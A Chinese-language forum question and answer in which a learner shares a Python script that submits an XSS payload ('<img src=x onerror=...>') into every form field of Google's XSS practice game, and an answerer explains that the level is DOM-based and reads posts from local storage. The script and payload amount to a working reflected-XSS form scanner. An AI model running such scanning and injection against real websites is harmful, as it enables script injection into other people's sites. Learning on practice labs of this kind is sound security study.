如何提交表单(包含文本区域和输入字段)python进行XSS攻击?

2024-06-07 11:12:12 发布

您现在位置:Python中文网/ 问答频道 /正文
3091 3

我一直在学习XSS和为XSS构建的谷歌游戏

http://www.xss-game.appspot.com/level2/frame

我成功地找到了这一级别的解决方案,即将脚本包装在图像标记中,但我无法使用下面的python代码找到漏洞

from bs4 import BeautifulSoup
from bs4.element import Script
from requests_html import HTMLSession
from urllib.parse import urljoin
from bs4 import BeautifulSoup

session = HTMLSession()

def retrieve_all_forms(url):
    r = session.get(url)
    soup = BeautifulSoup(r.html.html,"html.parser")
    return soup.find_all("form")


def retrieve_form_details(form):
    form_details = {}
    form_details["action"] = form.attrs.get("action").lower()
    form_details["request_method"] = form.attrs.get("method","get").lower()
    input_tags_info = []
    
    for itag in form.find_all("input"):
        type = itag.attrs.get("type", "text")
        name = itag.attrs.get("name")
        value = itag.attrs.get("value", "")
        input_tags_info.append({"type":type,"name":name,"value":value})
    for ttag in form.find_all("textarea"):
        name = ttag.attrs.get("name")
        value = ttag.attrs.get("value", "")
        type = ttag.attrs.get("type", "text")
        input_tags_info.append({"type":type,"name":name,"value":value})
    form_details["inputs"] = input_tags_info
    return form_details


def payload_insulation(form, payload):
    for itag in form["inputs"]:
        
        if itag["type"] !="hidden" and itag["type"] !="submit":
            print(itag)
            itag["value"] = payload
    #print(form["inputs"])
    return form

def submit_form(url,form,payload):
    data ={}
    #print(form["inputs"])
    for itag in form["inputs"]:
        data[itag["name"]] = itag["value"]
    print(data)
    if form["request_method"] == "post":
        res = session.post(url, data=data)
    elif form["request_method"] == "get":
        res = session.get(url, params=data)
    #print(res.text)
    if payload in res.text:
        return 1
    else:
        return 0


def form_xss(url,payload):
    forms = retrieve_all_forms(url)
    results = []
    i=1
    for form in forms:
        form_details =retrieve_form_details(form)
        form = payload_insulation(form_details,payload)
        if submit_form(url,form,payload) == 1:
            results.append((payload,True))
        #print("="*50, f"form #{i}", "="*50)
        #print(form_details)
    return results

    
print(form_xss("http://www.xss-game.appspot.com/level2/frame",'<img src=x onerror="alert(String.fromCharCode(88,83,83))"/>'))

我一直试图通过post发送数据,但img标记没有出现在响应中。有人能告诉我这段代码缺少什么吗?谢谢


Tags: nameinfromformurldatagetreturn
1条回答
网友
1楼 · 发布于 2024-06-07 11:12:12

使用JavaScript从本地存储读取帖子,如页面源中所示:

  function displayPosts() {
    var containerEl = document.getElementById("post-container");
    containerEl.innerHTML = "";

    var posts = DB.getPosts();
    for (var i=0; i<posts.length; i++) {
      var html = '<table class="message"> <tr> <td valign=top> '
        + '<img src="/static/level2_icon.png"> </td> <td valign=top '
        + ' class="message-container"> <div class="shim"></div>';

      html += '<b>You</b>';
      html += '<span class="date">' + new Date(posts[i].date) + '</span>';
      html += "<blockquote>" + posts[i].message + "</blockquote";
      html += "</td></tr></table>"
      containerEl.innerHTML += html; 
    }
  }

因此,它是一个基于DOM的XSS,在响应中不包含标记,因为它需要JavaScript和本地存储来运行

相关问题 更多 >

    编程相关推荐

    热门问题